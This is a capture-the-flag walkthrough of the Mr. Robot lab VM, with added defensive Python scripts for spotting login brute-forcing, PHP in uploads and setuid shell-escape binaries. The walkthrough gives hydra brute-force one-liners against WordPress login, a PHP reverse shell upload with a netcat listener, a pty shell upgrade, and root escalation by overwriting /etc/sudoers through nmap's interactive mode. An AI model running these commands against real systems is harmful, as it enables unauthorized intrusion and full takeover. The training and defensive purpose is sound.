nmap -A 192.168.1.213
1. Returns ports 80 & 443; not a whole lot to work with…
2. Start up a dirbuster scan while I check out what each of these does.
3. Dirbuster begins returning a bunch of directories showing that this website is a WordPress site!
4. Start up a WordPress scan.
5. The WordPress scan mentions that a robots.txt is available at
robots.txt available under: ‘http://192.168.1.213/robots.txt’
6. Navigate to this page and this is shown.
7. Navigate to the key-1-of-3.txt and we have our first key!
1. Navigate to fsocity.dic and download a 6.6 Mb file.
The file looks like a wordlist with about 900k words.
Will keep this in mind for potential brute-forcing later.
2. Go to the wp-admin page to see what we can find.
“user” as a potential username?
Running over HTTP, so view the login request in Burp.
Here I used the username “user” and the password “THEREISNOSPOON”.
3. When you type in an incorrect username and password on WordPress, it tells you “Invalid username!”, so I created this hydra one-liner to brute-force usernames until it no longer finds “Invalid username”:
hydra 192.168.1.213 http-form-post "/wp-login:log=^USER^&pwd=^PASS^:Invalid username" -L Desktop/fsocity.dic -p asdf -t 10 -w 30 -o output.txt
4. This command runs hydra to brute-force potential usernames!
The username Elliot popped up!
I confirm this by typing in Elliot with a random password.
Sure enough, I get a bad-password error.
5. I now edit my script to brute-force the password.
Whenever the password I entered was incorrect, I got “The password you entered for the username…”:
hydra 192.168.1.213 http-form-post "/wp-login:log=^USER^&pwd=^PASS^:The password you entered" -P Desktop/fsocity.dic -l elliot -t 10 -w 30 -o output.txt
6. So I ran this, and the first 10000 passwords didn’t work. I didn’t feel like waiting for all 850k, so I started from the back in case Jason decided to be a troll.
Ran the last 10000 passwords, but hydra got stuck: one of the child processes did not complete. I guessed that this meant the password must be in these last 10000. I cut it down to 1000 and tried again, and it still got stuck. I realized that all the child processes were iterating, so for them to get stuck they must have gotten stuck in the last 10-15 passwords. This is because we cannot tell whether the children moved on when there are no more passwords to check. I ran the last 15 passwords and it still got stuck!
7. At this point I plugged in all 15 passwords manually.
The password was ER28-0652.
Now we are met with a WordPress site.
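From the defender's side, the trace this leaves behind is hard to miss in the web server's access log: one client address hammering POST /wp-login.php, with the failures coming back as 200 (the form re-rendered with the error text hydra was matching on) while a real login answers with a 302 redirect. The script below is an added example written for this page, not part of the original walkthrough. It parses Apache/nginx combined-format lines and flags any address with ten or more failed login POSTs inside a sliding 60-second window. The log lines, addresses, timestamps and threshold are all constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format; timestamps like 18/Mar/2024:10:15:02 +0000.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_login_bursts(lines, login_path="/wp-login.php", threshold=10,
                      window=timedelta(seconds=60), failed_only=True):
    """Return [(ip, max_attempts_in_window)] for every client that POSTs to the
    login page at least `threshold` times inside any `window`-long interval.

    WordPress answers a failed login with 200 (form re-rendered with the error
    text) and a successful one with a 302 redirect, so failed_only=True keeps
    genuine logins out of the count."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].startswith(login_path):
            continue
        if failed_only and rec["status"] != 200:
            continue
        per_ip[rec["ip"]].append(rec["ts"])

    alerts = []
    for ip, stamps in per_ip.items():
        stamps.sort()
        best, lo = 0, 0
        # Sliding window: for each attempt, drop older ones that fall outside `window`.
        for hi, t in enumerate(stamps):
            while t - stamps[lo] > window:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            alerts.append((ip, best))
    return alerts

# --- constructed sample log (not captured from the walkthrough's target) ------
_BASE = datetime(2024, 3, 18, 10, 15, 0)

def _line(ip, method, path, status, offset_s):
    ts = (_BASE + timedelta(seconds=offset_s)).strftime("%d/%b/%Y:%H:%M:%S") + " +0000"
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

SAMPLE_LOG = (
    # 12 failed logins from one address in 22 seconds: a small slice of what a
    # hydra run with -t 10 leaves in the log
    [_line("10.0.0.5", "POST", "/wp-login.php", 200, 2 * i) for i in range(12)]
    # ordinary traffic: a page view and one successful login (302 redirect)
    + [_line("10.0.0.9", "GET", "/", 200, 5),
       _line("10.0.0.9", "POST", "/wp-login.php", 302, 40)]
)

if __name__ == "__main__":
    for ip, count in find_login_bursts(SAMPLE_LOG):
        print(f"ALERT {ip}: {count} failed login POSTs inside 60 s")
```

Running it on a real log is a matter of passing the open file to find_login_bursts; the threshold should sit well above a human's typo rate but below what even a throttled hydra run produces. Returning the same generic message for a wrong username and a wrong password removes the enumeration oracle this walkthrough relied on, but it does not stop the password guessing, which is why the log-side check is still worth having.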
8. First thing that comes to mind is a web shell.
9. Attempt to upload php-reverse-shell.php in the Media tab, but it “is not allowed for security reasons”.
10. I just started uploading my php-reverse-shell.php everywhere I could.
11. I tried to add it as a plugin and got an error, something like “plugin is not valid, failed to install”.
However, then I looked at my media and the reverse shell was there! For some reason, if plugins fail to install, this version of WordPress puts them into the media directory…
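Whatever the reason the failed plugin install landed the file in the media directory, the defensive lesson is that wp-content/uploads should hold media, not code. The following is an added example, not code from the walkthrough: it sweeps an uploads tree and reports any file whose extension a PHP handler would execute, or whose leading bytes contain a PHP open tag (which catches a script hidden behind an image extension). The extension list and the default path are assumptions made for the demo.

```python
import os

# Extensions that common Apache/PHP-FPM setups hand to the PHP interpreter
# (constructed list for this example; match it to your own server config).
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}
# A PHP open tag anywhere in the leading bytes means the file is code, whatever its name.
PHP_OPEN_TAGS = (b"<?php", b"<?=")

def is_suspicious_upload(filename, head):
    """True if the file name or its first bytes look like PHP rather than media."""
    _, ext = os.path.splitext(filename.lower())
    if ext in PHP_EXTENSIONS:
        return True
    return any(tag in head for tag in PHP_OPEN_TAGS)

def scan_uploads(root, head_size=4096):
    """Walk an uploads tree and return the sorted paths that look like PHP."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(head_size)
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if is_suspicious_upload(name, head):
                hits.append(path)
    return sorted(hits)

if __name__ == "__main__":
    import sys
    # Assumed default location; pass your own uploads directory as the first argument.
    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html/wp-content/uploads"
    for hit in scan_uploads(root):
        print("suspicious:", hit)
```

Pair the sweep with the usual hardening of configuring the web server to refuse to execute PHP from the uploads directory; the sweep then tells you that something was dropped there, and the server config means it would not have run.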
12. Ran this command
nc -lvp 36806
13. Navigated to the reverse shell at http://192.168.1.213/php-reverse-shell.php and bam, got a reverse shell!
14. Went into the home directory and found key 2 of 3.
Except we can’t view it…
15. However! We can view the password hash.
16. This gives us a hash we can easily crack with http://crackstation.net.
Cracking it gives us the password:
Enter Password: abcdefghijklmnopqrstuvwxyz
Entering it may give you an error saying “Must be run in terminal”.
17. Run this command:
python -c "import pty;pty.spawn('/bin/bash')"
This will “upgrade” your shell by spawning a proper pseudo-terminal.
Now we can see that key!
1. At this point I sat here and struggled with stuff, trying to figure out what to do, so I took a peek at another walkthrough and saw the word nmap.
2. I found where nmap was located and realized it was running version 3.81 (the current version is 7.21).
Tried to find an exploit for it or something, but no luck.
Just did nmap --help and started looking at stuff.
3. After tinkering with a bunch of things, I finally booted into nmap --interactive.
I typed “h”, looked at the help, and found that commands would run as root if you prefix them with “!”…
I thought there was no way that something this vulnerable would exist…
4. Sure enough, I ran
! echo "robot ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers
And obtained root. Went into the /root directory and found the last key.
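What made this work is a binary that runs with root privileges for any local user, most likely via the setuid bit (the page does not say how the box was set up, so that is an assumption here), combined with an nmap --interactive mode that lets the caller run shell commands and that modern nmap no longer ships. The following is an added example, not code from the walkthrough: it walks the filesystem for setuid files and flags the ones whose name is on a watchlist of programs known to offer a shell escape and that are executable by others. The watchlist is constructed for the demo, as are the sample paths used to exercise it.

```python
import os
import stat

# Setuid binaries known to hand the caller a shell or run arbitrary commands;
# the walkthrough's nmap --interactive "!" escape is the example on this page.
# Constructed watchlist for illustration; keep it aligned with your own baseline.
SHELL_ESCAPE_BINARIES = {"nmap", "vim", "vi", "find", "bash", "sh", "python",
                         "python2", "python3", "perl", "less", "more", "awk", "env"}

def iter_setuid_files(root="/"):
    """Yield (path, mode) for every regular file under root with the setuid bit set."""
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode

def classify_setuid(entries, watchlist=SHELL_ESCAPE_BINARIES):
    """Split (path, mode) pairs into (flagged, other).

    Flagged = basename is on the watchlist AND the file is executable by
    others, i.e. any local account could reach the escape. Everything else is
    listed for review but not alerted on."""
    flagged, other = [], []
    for path, mode in entries:
        name = os.path.basename(path)
        if name in watchlist and mode & stat.S_IXOTH:
            flagged.append(path)
        else:
            other.append(path)
    return flagged, other

def audit(root="/"):
    """Walk root and return (flagged, other) lists of setuid files."""
    return classify_setuid(iter_setuid_files(root))

if __name__ == "__main__":
    flagged, other = audit()
    for path in flagged:
        print("ALERT setuid shell-escape candidate:", path)
    print(f"{len(other)} other setuid files to review")
```

The walkthrough's nmap 3.81 would land in the flagged list; passwd lands in the other list, where it belongs. Comparing the full setuid list against a baseline taken at install time catches the less famous cases the watchlist misses.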